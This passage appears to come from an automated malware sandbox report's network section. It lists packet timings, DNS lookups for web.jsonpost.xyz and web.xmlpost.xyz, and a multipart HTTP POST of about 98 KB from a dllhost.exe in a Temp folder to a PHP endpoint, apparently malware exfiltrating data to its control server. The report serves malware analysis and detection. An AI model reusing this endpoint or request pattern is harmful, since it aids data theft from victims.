                                                                                Nov 29, 2024 01:53:22.237792969 CET804989972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:22.357795954 CET804989972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:22.357892990 CET4989980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:22.561831951 CET804989972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:22.561918974 CET4989980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:22.743645906 CET804989972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:22.743822098 CET4989980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:22.774653912 CET804989872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:22.774741888 CET4989880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:22.774873972 CET4989880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:22.863859892 CET804989972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:22.863878965 CET804989972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:22.863936901 CET804989972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:22.863945961 CET804989972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:22.864021063 CET804989972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:22.864037037 CET804989972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:22.864120007 CET804989972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:22.864135027 CET804989972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:22.864171028 CET804989972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:22.878633976 CET4990580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:22.894707918 CET804989872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:22.973442078 CET804989972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:22.973526001 CET4989980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:22.973578930 CET4989980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:22.998584032 CET804990572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:22.998694897 CET4990580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:22.998848915 CET4990580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:23.093666077 CET804989972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:23.118805885 CET804990572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:23.148111105 CET4990680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:23.268055916 CET804990672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:23.268285036 CET4990680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:23.268933058 CET4990680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:23.268969059 CET4990680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:23.269062042 CET4990680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:23.269144058 CET4990680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:23.430794954 CET804990672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:23.430809975 CET804990672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:23.430819035 CET804990672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:23.430829048 CET804990672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:23.430838108 CET804990672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:23.430847883 CET804990672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:23.430855989 CET804990672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:23.430869102 CET804990672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:23.430877924 CET804990672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:23.430886984 CET804990672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:23.430887938 CET4990680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:23.430896044 CET804990672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:23.430906057 CET804990672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:23.430958986 CET4990680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:23.430958986 CET4990680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:23.430984974 CET4990680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:23.663223028 CET804990672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:23.663234949 CET804990672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:23.663243055 CET804990672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:23.663250923 CET804990672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:23.663273096 CET804990672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:23.663366079 CET4990680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:23.663420916 CET4990680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:23.825793982 CET804990672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:23.829129934 CET4990680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:23.989763021 CET804990672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:23.992763042 CET4990680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:24.187381983 CET804990672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.187464952 CET4990680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:24.251365900 CET804990572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.251424074 CET4990580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:24.251477957 CET4990580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:24.307527065 CET804990672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.307542086 CET804990672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.307560921 CET804990672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.307593107 CET804990672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.307650089 CET804990672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.307668924 CET804990672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.307729006 CET804990672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.307766914 CET804990672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.307832956 CET804990672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.307841063 CET804990672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.307977915 CET804990672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.363614082 CET4991180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:24.371391058 CET804990572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.407706976 CET804990672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.407759905 CET4990680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:24.407804966 CET4990680192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:24.483544111 CET804991172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.483607054 CET4991180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:24.483777046 CET4991180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:24.527714968 CET804990672.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.589308977 CET4991380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:24.603652954 CET804991172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.709239960 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.709315062 CET4991380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:24.709474087 CET4991380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:24.709549904 CET4991380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:24.709598064 CET4991380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:24.709614038 CET4991380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:24.829304934 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.829583883 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.829606056 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.829639912 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.829660892 CET4991380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:24.829720020 CET4991380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:24.829809904 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.829854012 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.829865932 CET4991380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:24.829940081 CET4991380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:24.829953909 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.829962969 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.829998970 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.830009937 CET4991380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:24.830048084 CET4991380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:24.830053091 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.830061913 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.830091953 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.830106020 CET4991380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:24.830140114 CET4991380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:24.949801922 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.949815035 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.949863911 CET4991380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:24.949908018 CET4991380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:24.949934959 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.949968100 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.950012922 CET4991380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:24.993771076 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:24.994496107 CET4991380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:25.113809109 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:25.113888979 CET4991380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:25.157912970 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:25.157973051 CET4991380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:25.277873993 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:25.365757942 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:25.365839958 CET4991380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:25.609814882 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:25.609879017 CET4991380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:25.627746105 CET804991172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:25.627830029 CET4991180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:25.628520012 CET4991180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:25.662494898 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:25.665218115 CET4991380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:25.729984999 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:25.738419056 CET4991480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:25.748385906 CET804991172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:25.785254955 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:25.785267115 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:25.785341024 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:25.785350084 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:25.785403967 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:25.785430908 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:25.785542011 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:25.785552025 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:25.858375072 CET804991472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:25.858447075 CET4991480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:25.858565092 CET4991480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:25.892183065 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:25.892252922 CET4991380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:25.892405033 CET4991380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:25.978398085 CET804991472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.012351036 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.054455996 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.174356937 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.174427032 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.175827026 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.175852060 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.175906897 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.176047087 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.295671940 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.295922995 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.295967102 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.295975924 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.296040058 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.296082973 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.296092033 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.296140909 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.296154976 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.296190023 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.296195030 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.296233892 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.296238899 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.296247959 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.296282053 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.296298981 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.296381950 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.296391010 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.296427011 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.296438932 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.416090012 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.416102886 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.416169882 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.416179895 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.416198015 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.416239977 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.457742929 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.457850933 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.577935934 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.579961061 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.625775099 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.745934963 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.747699976 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.949788094 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.949870110 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:27.116488934 CET804991472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:27.116604090 CET4991480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:27.116646051 CET4991480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:27.167248964 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:27.167325020 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:27.222898006 CET4992180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:27.237763882 CET804991472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:27.288592100 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:27.288722992 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:27.288877964 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:27.288887024 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:27.288896084 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:27.289026022 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:27.289036036 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:27.289043903 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:27.289191961 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:27.344084978 CET804992172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:27.344167948 CET4992180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:27.344398975 CET4992180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:27.405345917 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:27.405410051 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:27.405443907 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:27.464520931 CET804992172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:27.525463104 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:27.597306013 CET4992180192.168.2.472.52.178.23

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Nov 29, 2024 01:52:03.935611010 CET5219053192.168.2.41.1.1.1
                                                                                Nov 29, 2024 01:52:03.936781883 CET5847253192.168.2.41.1.1.1
                                                                                Nov 29, 2024 01:52:04.156912088 CET53584721.1.1.1192.168.2.4
                                                                                Nov 29, 2024 01:52:04.454211950 CET53521901.1.1.1192.168.2.4
                                                                                Nov 29, 2024 01:52:09.060357094 CET6337253192.168.2.41.1.1.1
                                                                                Nov 29, 2024 01:52:09.198055983 CET53633721.1.1.1192.168.2.4
                                                                                Nov 29, 2024 01:52:13.816207886 CET4956553192.168.2.41.1.1.1
                                                                                Nov 29, 2024 01:52:13.954418898 CET53495651.1.1.1192.168.2.4
                                                                                Nov 29, 2024 01:52:18.818794012 CET6397253192.168.2.41.1.1.1
                                                                                Nov 29, 2024 01:52:18.956420898 CET53639721.1.1.1192.168.2.4
                                                                                Nov 29, 2024 01:52:23.861871958 CET5917653192.168.2.41.1.1.1
                                                                                Nov 29, 2024 01:52:24.000035048 CET53591761.1.1.1192.168.2.4
                                                                                Nov 29, 2024 01:52:28.854682922 CET5488953192.168.2.41.1.1.1
                                                                                Nov 29, 2024 01:52:28.995160103 CET53548891.1.1.1192.168.2.4
                                                                                Nov 29, 2024 01:52:33.816492081 CET5855753192.168.2.41.1.1.1
                                                                                Nov 29, 2024 01:52:33.953636885 CET53585571.1.1.1192.168.2.4
                                                                                Nov 29, 2024 01:52:38.894315004 CET5135653192.168.2.41.1.1.1
                                                                                Nov 29, 2024 01:52:39.032515049 CET53513561.1.1.1192.168.2.4
                                                                                Nov 29, 2024 01:52:43.799405098 CET5908053192.168.2.41.1.1.1
                                                                                Nov 29, 2024 01:52:43.938195944 CET53590801.1.1.1192.168.2.4
                                                                                Nov 29, 2024 01:52:48.800633907 CET6482353192.168.2.41.1.1.1
                                                                                Nov 29, 2024 01:52:48.938224077 CET53648231.1.1.1192.168.2.4
                                                                                Nov 29, 2024 01:52:53.846334934 CET5615353192.168.2.41.1.1.1
                                                                                Nov 29, 2024 01:52:53.984343052 CET53561531.1.1.1192.168.2.4
                                                                                Nov 29, 2024 01:52:58.799515009 CET5763553192.168.2.41.1.1.1
                                                                                Nov 29, 2024 01:52:58.936994076 CET53576351.1.1.1192.168.2.4
                                                                                Nov 29, 2024 01:53:03.815944910 CET5431353192.168.2.41.1.1.1
                                                                                Nov 29, 2024 01:53:03.961301088 CET53543131.1.1.1192.168.2.4
                                                                                Nov 29, 2024 01:53:08.815901995 CET5719353192.168.2.41.1.1.1
                                                                                Nov 29, 2024 01:53:08.953022957 CET53571931.1.1.1192.168.2.4
                                                                                Nov 29, 2024 01:53:13.799598932 CET5204453192.168.2.41.1.1.1
                                                                                Nov 29, 2024 01:53:13.937366009 CET53520441.1.1.1192.168.2.4
                                                                                Nov 29, 2024 01:53:18.816462994 CET6125253192.168.2.41.1.1.1
                                                                                Nov 29, 2024 01:53:18.955218077 CET53612521.1.1.1192.168.2.4
                                                                                Nov 29, 2024 01:53:23.924268961 CET5367653192.168.2.41.1.1.1
                                                                                Nov 29, 2024 01:53:24.062901974 CET53536761.1.1.1192.168.2.4

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Nov 29, 2024 01:52:03.935611010 CET192.168.2.41.1.1.10x14d3Standard query (0)web.jsonpost.xyzA (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 01:52:03.936781883 CET192.168.2.41.1.1.10x294Standard query (0)web.xmlpost.xyzA (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 01:52:09.060357094 CET192.168.2.41.1.1.10xa970Standard query (0)web.xmlpost.xyzA (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 01:52:13.816207886 CET192.168.2.41.1.1.10xbbb2Standard query (0)web.xmlpost.xyzA (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 01:52:18.818794012 CET192.168.2.41.1.1.10xba43Standard query (0)web.xmlpost.xyzA (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 01:52:23.861871958 CET192.168.2.41.1.1.10x985aStandard query (0)web.xmlpost.xyzA (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 01:52:28.854682922 CET192.168.2.41.1.1.10x84c7Standard query (0)web.xmlpost.xyzA (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 01:52:33.816492081 CET192.168.2.41.1.1.10x4dd6Standard query (0)web.xmlpost.xyzA (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 01:52:38.894315004 CET192.168.2.41.1.1.10xcfStandard query (0)web.xmlpost.xyzA (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 01:52:43.799405098 CET192.168.2.41.1.1.10x6aeaStandard query (0)web.xmlpost.xyzA (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 01:52:48.800633907 CET192.168.2.41.1.1.10x9278Standard query (0)web.xmlpost.xyzA (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 01:52:53.846334934 CET192.168.2.41.1.1.10x799aStandard query (0)web.xmlpost.xyzA (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 01:52:58.799515009 CET192.168.2.41.1.1.10xcd72Standard query (0)web.xmlpost.xyzA (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 01:53:03.815944910 CET192.168.2.41.1.1.10x792bStandard query (0)web.xmlpost.xyzA (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 01:53:08.815901995 CET192.168.2.41.1.1.10xb77dStandard query (0)web.xmlpost.xyzA (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 01:53:13.799598932 CET192.168.2.41.1.1.10x5b94Standard query (0)web.xmlpost.xyzA (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 01:53:18.816462994 CET192.168.2.41.1.1.10xc19dStandard query (0)web.xmlpost.xyzA (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 01:53:23.924268961 CET192.168.2.41.1.1.10x28d9Standard query (0)web.xmlpost.xyzA (IP address)IN (0x0001)false

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Nov 29, 2024 01:52:04.156912088 CET1.1.1.1192.168.2.40x294Name error (3)web.xmlpost.xyznonenoneA (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 01:52:04.454211950 CET1.1.1.1192.168.2.40x14d3No error (0)web.jsonpost.xyz72.52.178.23A (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 01:52:09.198055983 CET1.1.1.1192.168.2.40xa970Name error (3)web.xmlpost.xyznonenoneA (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 01:52:13.954418898 CET1.1.1.1192.168.2.40xbbb2Name error (3)web.xmlpost.xyznonenoneA (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 01:52:18.956420898 CET1.1.1.1192.168.2.40xba43Name error (3)web.xmlpost.xyznonenoneA (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 01:52:24.000035048 CET1.1.1.1192.168.2.40x985aName error (3)web.xmlpost.xyznonenoneA (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 01:52:28.995160103 CET1.1.1.1192.168.2.40x84c7Name error (3)web.xmlpost.xyznonenoneA (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 01:52:33.953636885 CET1.1.1.1192.168.2.40x4dd6Name error (3)web.xmlpost.xyznonenoneA (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 01:52:39.032515049 CET1.1.1.1192.168.2.40xcfName error (3)web.xmlpost.xyznonenoneA (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 01:52:43.938195944 CET1.1.1.1192.168.2.40x6aeaName error (3)web.xmlpost.xyznonenoneA (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 01:52:48.938224077 CET1.1.1.1192.168.2.40x9278Name error (3)web.xmlpost.xyznonenoneA (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 01:52:53.984343052 CET1.1.1.1192.168.2.40x799aName error (3)web.xmlpost.xyznonenoneA (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 01:52:58.936994076 CET1.1.1.1192.168.2.40xcd72Name error (3)web.xmlpost.xyznonenoneA (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 01:53:03.961301088 CET1.1.1.1192.168.2.40x792bName error (3)web.xmlpost.xyznonenoneA (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 01:53:08.953022957 CET1.1.1.1192.168.2.40xb77dName error (3)web.xmlpost.xyznonenoneA (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 01:53:13.937366009 CET1.1.1.1192.168.2.40x5b94Name error (3)web.xmlpost.xyznonenoneA (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 01:53:18.955218077 CET1.1.1.1192.168.2.40xc19dName error (3)web.xmlpost.xyznonenoneA (IP address)IN (0x0001)false
                                                                                Nov 29, 2024 01:53:24.062901974 CET1.1.1.1192.168.2.40x28d9Name error (3)web.xmlpost.xyznonenoneA (IP address)IN (0x0001)false

                                                                                HTTP Request Dependency Graph

                                                                                • web.jsonpost.xyz

                                                                                HTTP Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.44973072.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:04.581871033 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
